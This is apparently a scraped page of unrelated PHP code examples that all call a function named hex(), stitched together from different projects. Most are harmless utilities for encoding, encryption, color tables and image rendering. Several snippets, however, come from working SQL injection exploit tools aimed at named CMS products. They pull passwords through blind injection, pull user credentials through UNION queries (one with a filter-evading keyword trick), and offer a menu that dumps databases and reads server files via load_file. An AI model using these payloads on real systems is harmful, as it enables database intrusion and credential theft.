예제 #1
0
function encCode($content)
{
    $i = '';
    $c = '';
    $c = '';
    for ($i = 1; $i <= len($content); $i++) {
        $c = $c . '%' . hex(asc(mid($content, $i, 1)));
    }
    $encCode = $c;
    return @$encCode;
}
예제 #2
0
function check_chr($hostname, $path, $pos, $char, $username)
{
    $char = ord($char);
    if (!($sp = fsockopen($hostname, 80, $errno, $errstr, 5))) {
        die("[-] Unknow hostname.");
    }
    $query = hex("1' OR ASCII(SUBSTRING((SELECT password FROM morcego_users WHERE username='******'),{$pos},1))={$char}-- ");
    $request = "GET {$path}fichero.php?{$query} HTTP/1.1\r\n" . "Host: {$hostname}\r\n" . "Connection: Close\r\n\r\n";
    fputs($sp, $request);
    while (!feof($sp)) {
        $reply .= fgets($sp, 1024);
    }
    fclose($sp);
    if (preg_match("|Page not found|", $reply)) {
        return false;
    } else {
        return true;
    }
}
예제 #3
0
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n";
if ($argc != 2) {
    echo "Usage: \n";
    echo "php {$argv['0']} <target url>\n";
    echo "Example:\n";
    echo "php {$argv['0']} http://www.website.com/blog\n";
    exit;
}
$target = $argv[1];
if (substr($target, strlen($target) - 1) != "/") {
    $target .= "/";
}
$inject = $target . "index.php?id=" . urlencode("-0' ");
echo "[*] Trying to get informations...\n";
$token = uniqid();
$token_hex = hex($token);
// http://localhost/cms/theblog/theblog2-0/index.php?id=-62%27%20UNION%20ALL%20SELECT%201,2,3,4,5,concat%28login,0x3c3d3e,senha,0x3c3d3e,nivel%29,7,8,9,10,11,12,13%20from%20theblog_users%20LIMIT%200,1--+
$infos = file_get_contents($inject . urlencode("union all select 1,2,3,4,5,concat({$token_hex},user(),{$token_hex},version(),{$token_hex}),7,8,9,10,11,12,13-- "));
$infos_r = array();
preg_match_all("/{$token}(.*){$token}(.*){$token}/", $infos, $infos_r);
$user = $infos_r[1][0];
$version = $infos_r[2][0];
if ($user) {
    echo "[!] MySQL version: {$version}\n";
    echo "[!] MySQL user: {$user}\n";
} else {
    echo "[-] Error while getting informations.\n";
}
echo "[*] Getting users...\n";
$i = 0;
while (true) {
예제 #4
0
파일: URL.php 프로젝트: 313801120/AspPhpCms
function urlToAsc($url)
{
    $i = '';
    for ($i = 1; $i <= len($url); $i++) {
        $urlToAsc = $urlToAsc . '%' . hex(ascW(mid($url, $i, 1)));
    }
    return @$urlToAsc;
}
예제 #5
0
function main($msg = null)
{
    global $token, $token_hex;
    echo "\n" . $msg . "\n";
    puts("[>] MAIN MENU");
    puts("[1] Browse MySQL");
    puts("[2] Run SQL Query");
    puts("[3] Read file");
    puts("[4] About");
    puts("[0] Exit");
    $resp = gets();
    if ($resp == "0") {
        exit;
    } elseif ($resp == "1") {
        // pega dbs
        $i = 0;
        puts("[.] Getting databases:");
        while (true) {
            $pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT {$i},1");
            if ($pega) {
                puts(" - " . $pega);
            } else {
                break;
            }
            $i++;
        }
        puts("[!] Current database: " . runquery("SELECT database()"));
        puts("[?] Enter database name for select:");
        $own = array();
        $own['db'] = gets();
        $own['dbh'] = hex($own['db']);
        // pega tables da db
        $i = 0;
        puts("[.] Getting tables from {$own['db']}:");
        while (true) {
            $pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema={$own['dbh']} LIMIT {$i},1");
            if ($pega) {
                puts(" - " . $pega);
            } else {
                break;
            }
            $i++;
        }
        puts("[?] Enter table name for select:");
        $own['tb'] = gets();
        $own['tbh'] = hex($own['tb']);
        // pega colunas da table
        $i = 0;
        puts("[.] Getting columns from {$own['db']}.{$own['tb']}:");
        while (true) {
            $pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema={$own['dbh']} AND table_name={$own['tbh']} LIMIT {$i},1");
            if ($pega) {
                puts(" - " . $pega);
            } else {
                break;
            }
            $i++;
        }
        puts("[?] Enter columns name, separated by commas (\",\") for select:");
        $own['cl'] = explode(",", gets());
        // pega dados das colunas
        foreach ($own['cl'] as $coluna) {
            $i = 0;
            puts("[=] Column: {$coluna}");
            while (true) {
                $pega = runquery("SELECT {$coluna} FROM {$own['db']}.{$own['tb']} LIMIT {$i},1");
                if ($pega) {
                    puts(" - {$pega}");
                    $i++;
                } else {
                    break;
                }
            }
            echo "\n[ ] -+-\n";
        }
        main();
    } elseif ($resp == "2") {
        puts("[~] RUN SQL QUERY");
        puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");
        puts("[?] Query (enter for exit): ");
        $query = gets();
        if (!$query) {
            main();
        } else {
            main(runquery($query . "\n"));
        }
    } elseif ($resp == "3") {
        puts("[?] File path (may not have priv):");
        $file = hex(gets());
        $le = runquery("SELECT load_file({$file}) AS wc");
        if ($le) {
            main($le);
        } else {
            main("File not found, empty or no priv!");
        }
    } elseif ($resp == "4") {
        puts("Coded by WhiteCollarGroup");
        puts("www.wcgroup.host56.com");
        puts("*****@*****.**");
        puts("twitter.com/WCollarGroup");
        puts("facebook.com/WCollarGroup");
        puts("wcollargroup.blogspot.com");
        main();
    } else {
        main("[!] Wrong choice.");
    }
}
예제 #6
0
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0)
{
    //    动态密钥长度,相同的明文产生不同的密钥依靠动态密钥(初始化向量IV)
    //    随机密钥长度 取值0~32
    //    $ckey_length = 4;
    $ckey_length = 0;
    //    密钥
    $key = md5($key ? $key : UC_KEY);
    //    密钥a参与加/解密
    $keya = md5(substr($key, 0, 16));
    //    密钥b用来做数据完整性的验证
    $keyb = md5(substr($key, 16, 16));
    //    密钥c用于变化生成的密文(初始向量IV)
    $keyc = $ckey_length ? $operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length) : '';
    //    参与运算的密钥
    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);
    //    明文,前10位用来保存时间戳,解密时验证有效性
    //    10到26位用来保存$keyb
    //    解密时通过密钥$keyb验证数据完整性
    //    解码从$ckey_length开始,前为动态密钥
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    //返回的是0-255的随机排列的数组
    $rndkey = array();
    //  产生密钥簿,用来产生密钥
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    //  用固定算法,打乱密钥簿,增加随机性。
    //    好像很复杂,实际并没有增加密文强度
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    $xx = '';
    // 真实地密钥
    //    核心加密/解密部分
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$i];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $xx .= chr(($box[$a] + $box[$j]) % 256);
        //        从密钥簿获取密钥进行异或,再转成字符
        $result .= chr(ord($string[$i]) ^ $box[($box[$a] + $box[$j]) % 256]);
    }
    echo "xor key is " . hex($xx) . "\n";
    if ($operation == 'DECODE') {
        //        验证数据的有效性
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        //      把动态密钥保存在密文里,使每次加密产生的密文不同
        //      加密密文有特殊字符,用base64编码
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}
예제 #7
0
                    if ($n == 12) {
                        return "CC";
                    } else {
                        if ($n == 13) {
                            return "DD";
                        } else {
                            if ($n == 14) {
                                return "EE";
                            } else {
                                return "FF";
                            }
                        }
                    }
                }
            }
        }
    }
}
function hex($r, $g, $b)
{
    return hex_of($r) . hex_of($g) . hex_of($b);
}
echo "<html><table>\n";
for ($i = 0; $i < 16; $i++) {
    for ($j = 0; $j < 16; $j++) {
        for ($k = 0; $k < 16; $k++) {
            echo "  <tr><td>" . hex($i, $j, $k) . "</td><td width=16px bgcolor=" . hex($i, $j, $k) . "></tr>\n";
        }
    }
}
echo "\n</table></html>\n";
예제 #8
0
<?php

require dirname(__FILE__) . '/../lib/HashCryptMd5.php';
require dirname(__FILE__) . '/../lib/HashCryptSha1.php';
for ($i = 0; $i < 20; $i++) {
    $string .= "It works!:) ";
}
$passwordEncoding = '1234567890';
$passwordDecoding = '1234567890';
$cryptClass = 'HashCryptMd5';
p($string);
//encoding
$stringOFB = $cryptClass::lib()->encodeOFB($string, $passwordEncoding);
$stringCFB = $cryptClass::lib()->encodeCFB($string, $passwordEncoding);
hex($stringOFB);
hex($stringCFB);
//decoding
$stringOFB = $cryptClass::lib()->decodeOFB($stringOFB, $passwordDecoding);
$stringCFB = $cryptClass::lib()->decodeCFB($stringCFB, $passwordDecoding);
p($stringOFB);
p($stringCFB);
function p($s)
{
    echo "<p>" . $s . "</p>";
}
function hex($s)
{
    p(bin2hex($s));
}
예제 #9
0
function name($q)
{
    global $names;
    foreach ($names as $hex => $name) {
        if ($q == $name) {
            return hex($hex);
        }
    }
    foreach ($names as $hex => $name) {
        $search = "/^{$q}/i";
        if (preg_match($search, $name)) {
            return hex($hex);
        }
    }
    return false;
}
예제 #10
0
        $request = strip_tags(file_get_contents($url . urlencode("union all select 1,2,3,4,concat(" . hex($token) . ",user," . hex($token) . ",pass," . hex($token) . "),6,7 from supernews_login limit {$i},1-- ")));
        preg_match_all("/{$token}(.*){$token}(.*){$token}/", $request, $get);
        if ($get[1][0] != "") {
            $user = $get[1][0];
            $pass = $get[2][0];
            echo "\nUser: {$user}\nPass: {$pass}\n";
            $i++;
        } else {
            echo "\nGood luck! :-D";
            break;
        }
    }
} elseif ($version == 2) {
    $i = 0;
    while (true) {
        $request = strip_tags(file_get_contents($url . urlencode("uniunionon seleselectct 1,2,3,4,5,concat(" . hex($token) . ",user," . hex($token) . ",pass," . hex($token) . "),7,8 from supernews_login limit {$i},1-- ")));
        preg_match_all("/{$token}(.*){$token}(.*){$token}/", $request, $get);
        if ($get[1][0] != "") {
            $user = $get[1][0];
            $pass = $get[2][0];
            echo "\nUser: {$user}\nPass: {$pass}\n";
            $i++;
        } else {
            echo "\nGood luck! :-D";
            break;
        }
    }
} else {
    echo "\n\nThis site are using an unknown version of Supernews or another CMS.";
    echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
    echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables.";
예제 #11
0
function createart($id, $hue, $show)
{
    if (file_exists("images/art/art_" . $id . "_" . $hue . ".png")) {
        if ($show == 1) {
            Header("Content-type: image/png");
            Header("Content-disposition: inline; filename=art_" . $id . "_" . $hue . ".png");
            $img = imagecreatefrompng("images/art/art_" . $id . "_" . $hue . ".png");
            $black = imagecolorallocate($img, 0, 0, 0);
            imagecolortransparent($img, $black);
            imagepng($img);
            return;
        }
        //return;
    }
    $oldhue = $hue;
    $mulpath = "./uofiles/";
    $hue = hex($hue);
    $id = hex($id);
    $id += 0x4000;
    $hues = FALSE;
    $tiledata = FALSE;
    $gumpindex = FALSE;
    $gumpfile = FALSE;
    //open files for reading
    //**********************
    if ($hue < 1 || $hue > 65535) {
        //If invalid or missing hue, unset hue and don't read hues.mul and tiledata.mul
        $hue = 0;
    } else {
        //If valid hue, read hues.mul and tiledata.mul
        $hues = fopen("{$mulpath}hues.mul", "rb");
        if ($hues == FALSE) {
            $hue = 0;
        }
        $tiledata = fopen("{$mulpath}tiledata.mul", "rb");
        if ($tiledata == FALSE) {
            $hue = 0;
        } else {
            $index = $id - 0x4000;
            $group = intval($index / 32);
            $groupidx = $index % 32;
            fseek($tiledata, 512 * 836 + 1188 * $group + 4 + $groupidx * 37, SEEK_SET);
            $tileflag = read_byte($tiledata, 4);
            if ($tileflag & 0x40000) {
                $partialhue = 1;
            } else {
                $partialhue = 0;
            }
            fclose($tiledata);
        }
    }
    //Read artidx.mul
    $gumpindex = fopen("{$mulpath}artidx.mul", "rb");
    if ($gumpindex == FALSE) {
        unavailable_pic();
        exit;
    } else {
        fseek($gumpindex, $id * 12, SEEK_SET);
        $lookup = read_byte($gumpindex, 4);
        $size = read_byte($gumpindex, 4);
        fclose($gumpindex);
    }
    //Read art.mul
    $gumpfile = fopen("{$mulpath}art.mul", "rb");
    if ($gumpfile == FALSE) {
        unavailable_pic();
        exit;
    } else {
        fseek($gumpfile, $lookup, SEEK_SET);
        $flag = read_byte($gumpfile, 4);
        $width = read_byte($gumpfile, 2);
        $height = read_byte($gumpfile, 2);
        //create base image
        //**********************
        $im = imagecreatetruecolor($width, $height);
        $almostblack = imagecolorallocate($im, 0, 0, 0);
        imagefill($im, 0, 0, $almostblack);
        $black = imagecolorallocate($im, 0, 0, 0);
        imagecolortransparent($im, $black);
        imagealphablending($im, true);
        imageSaveAlpha($im, true);
        //Read pixels
        //**********************
        for ($i = 0; $i < $height; $i++) {
            $offset[$i] = read_byte($gumpfile, 2);
        }
        $datastart = ftell($gumpfile);
        $x = 0;
        $y = 0;
        //Display without hues
        //**********************
        if ($hue <= 0) {
            while ($y < $height) {
                $xOffset = read_byte($gumpfile, 2);
                $xRun = read_byte($gumpfile, 2);
                if ($xRun + $xOffset > 2048) {
                    break;
                } else {
                    if ($xRun + $xOffset != 0) {
                        $x += $xOffset;
                        for ($Run = 0; $Run < $xRun; $Run++) {
                            $color[$Run] = read_byte($gumpfile, 2);
                            $r = ($color[$Run] >> 10) * 8;
                            $g = ($color[$Run] >> 5 & 0x1f) * 8;
                            $b = ($color[$Run] & 0x1f) * 8;
                            if (imagecolorexact($im, $r, $g, $b) == -1) {
                                $col = imageColorAllocate($im, $r, $g, $b);
                                imagesetpixel($im, $x, $y, $col);
                            } else {
                                $found = imagecolorexact($im, $r, $g, $b);
                                imagesetpixel($im, $x, $y, $found);
                            }
                            $x++;
                        }
                    } else {
                        $x = 0;
                        $y++;
                        if (isset($offset[$y])) {
                            fseek($gumpfile, $offset[$y] * 2 + $datastart, SEEK_SET);
                        }
                    }
                }
            }
        } else {
            $hue = $hue - 1;
            $orighue = $hue;
            if ($hue > 0x8000) {
                $hue = $hue - 0x8000;
            }
            if ($hue > 3001) {
                $hue = 1;
            }
            $colors = intval($hue / 8) * 4;
            $colors = 4 + $hue * 88 + $colors;
            fseek($hues, $colors, SEEK_SET);
            for ($i = 0; $i < 32; $i++) {
                $color32[$i] = read_byte($hues, 2);
                $color32[$i] |= 0x8000;
            }
            while ($y < $height) {
                $xOffset = read_byte($gumpfile, 2);
                $xRun = read_byte($gumpfile, 2);
                if ($xRun + $xOffset > 2048) {
                    break;
                } else {
                    if ($xRun + $xOffset != 0) {
                        $x += $xOffset;
                        for ($Run = 0; $Run < $xRun; $Run++) {
                            $color[$Run] = read_byte($gumpfile, 2);
                            $r = $color[$Run] >> 10;
                            $g = $color[$Run] >> 5 & 0x1f;
                            $b = $color[$Run] & 0x1f;
                            if ($partialhue == 1 && ($r == $g && $r == $b)) {
                                $newr = ($color32[$r] >> 10) * 8;
                                $newg = ($color32[$r] >> 5 & 0x1f) * 8;
                                $newb = ($color32[$r] & 0x1f) * 8;
                            } else {
                                if ($partialhue == 1) {
                                    $newr = $r * 8;
                                    $newg = $g * 8;
                                    $newb = $b * 8;
                                } else {
                                    $newr = ($color32[$r] >> 10) * 8;
                                    $newg = ($color32[$r] >> 5 & 0x1f) * 8;
                                    $newb = ($color32[$r] & 0x1f) * 8;
                                }
                            }
                            if (imagecolorexact($im, $newr, $newg, $newb) == -1) {
                                $col = imageColorAllocate($im, $newr, $newg, $newb);
                                imagesetpixel($im, $x, $y, $col);
                            } else {
                                $found = imagecolorexact($im, $newr, $newg, $newb);
                                imagesetpixel($im, $x, $y, $found);
                            }
                            $x++;
                        }
                    } else {
                        $x = 0;
                        $y++;
                        if (isset($offset[$y])) {
                            fseek($gumpfile, $offset[$y] * 2 + $datastart, SEEK_SET);
                        }
                    }
                }
            }
            fclose($hues);
        }
    }
    fclose($gumpfile);
    $index = $id - 0x4000;
    if (hexdec($oldhue) > 0) {
        $hue = $hue + 1;
    }
    imagepng($im, "images/art/art_" . $index . "_" . $hue . ".png", 0, NULL);
    imagedestroy($im);
    if ($show == 1) {
        Header("Content-type: image/png");
        Header("Content-disposition: inline; filename=art_" . $id . "_" . $hue . ".png");
        $img = imagecreatefrompng("images/art/art_" . $index . "_" . $hue . ".png");
        $black = imagecolorallocate($img, 0, 0, 0);
        imagecolortransparent($img, $black);
        imagepng($img);
        imagedestroy($img);
    }
    return;
}
예제 #12
0
function blockToCode($block)
{
    if ($block == NULL) {
        return '';
    }
    if ($block->nodeName != 'block') {
        echo "xml Wrong";
        echo $block->nodeName;
        return '';
    }
    $type = $block->getAttribute('type');
    switch ($type) {
        case 'controls_if':
            return controls_if($block);
            break;
        case 'logic_boolean':
            return logic_bool($block);
            break;
        case 'logic_compare':
            return logic_compare($block);
            break;
        case 'logic_operation':
            return logic_operation($block);
            break;
        case 'logic_negate':
            return logic_negate($block);
            break;
        case 'logic_ternary':
            return logic_ternary($block);
            break;
        case 'logic_null':
            return logic_null($block);
            break;
        case 'controls_whileUntil':
            return controls_whileUntil($block);
            break;
        case 'controls_flow_statements':
            return controls_flow_statements($block);
            break;
        case 'io_buzzer':
            return buzzer_msec($block);
            break;
        case 'text':
            return textvalue($block);
            break;
        case 'text_print':
            return prints($block);
            break;
        case 'math_number':
            return math_number($block);
            break;
        case 'motion':
            return motion($block);
            break;
        case 'turn':
            return turn($block);
            break;
        case 'soft_turn':
            return soft_turn($block);
            break;
        case 'back_turn':
            return back_turn($block);
            break;
        case 'position_motion':
            return position_motion($block);
            break;
        case 'position_turn':
            return position_turn($block);
            break;
        case 'position_turn_soft':
            return position_turn_soft($block);
            break;
        case 'position_turn_back':
            return position_turn_back($block);
            break;
        case 'sensor_white':
            return sensor_white($block);
            break;
        case 'sensor_sharp':
            return sensor_sharp($block);
            break;
        case 'sensor_ir':
            return sensor_ir($block);
            break;
        case 'buzzer_on':
            return buzzer_on($block);
            break;
        case 'buzzer_off':
            return buzzer_off($block);
            break;
        case 'delay_ms':
            return delay_ms($block);
            break;
        case 'math_arithmetic':
            return math_arithmetic($block);
            break;
        case 'math_single':
            return math_single($block);
            break;
        case 'math_trig':
            return math_trig($block);
            break;
        case 'math_modulo':
            return math_modulo($block);
            break;
        case 'register':
            return register($block);
            break;
        case 'pin':
            return pin($block);
            break;
        case 'set_item':
            return set_item($block);
            break;
        case 'call_function':
            return call_function($block);
            break;
        case 'call_function_with_return':
            return call_function_with_return($block);
            break;
        case 'function_defreturn':
            return function_defreturn($block);
            break;
        case 'function_defnoreturn':
            return function_defnoreturn($block);
            break;
        case 'procedures_callnoreturn':
            return procedures_callnoreturn($block);
            break;
        case 'procedures_callreturn':
            return procedures_callreturn($block);
            break;
        case 'hex':
            return hex($block);
            break;
        case 'return':
            return returnr($block);
            break;
        case 'variable_get':
            return variable_get($block);
            break;
        case 'incl_ude':
            return incl_ude($block);
            break;
        case 'define':
            return def_ine($block);
            break;
        default:
            echo "not defined in blockToCode " . $block->getAttribute('type');
    }
}